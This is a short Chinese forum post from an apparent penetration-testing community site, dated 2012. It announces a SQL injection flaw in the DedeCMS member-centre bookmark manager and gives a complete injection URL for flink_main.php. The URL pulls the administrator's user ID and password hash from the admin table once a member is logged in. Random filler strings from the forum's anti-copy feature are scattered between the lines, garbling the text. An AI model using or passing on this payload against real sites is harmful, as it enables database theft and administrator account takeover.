中国网络渗透测试联盟
标题:
DedeCMS会员中心书签管理SQL注射漏洞
[打印本页]
作者:
admin
时间:
2012-12-31 09:21
标题:
DedeCMS会员中心书签管理SQL注射漏洞
DedeCMS会员中心SQL注射漏洞
7 n: @$ i5 e8 x& p+ n( p6 p
需要magic_quotes_gpc = Off
( a2 u6 @: ?8 f. y, z
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
2 N: K/ Z* h* @# O5 M
0 C: X2 ^+ x( F' Z# L) ~8 D
DedeCMS会员中心书签管理SQL注射漏洞
1 G" s0 g" J6 A; g, e; d, \
成功利用该漏洞可获得管理员密码
! @: A9 a8 f3 Z' d6 G
) _& z$ I' b2 J+ E- U. ^3 l4 K0 T3 d
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
( i# T% m( s: R F& L8 J5 N6 I
) C1 n. L. D9 f
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r
6 m% K" [% Y: T# H4 o
作者:
kook
时间:
2013-1-10 01:33
#89 顶起。
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2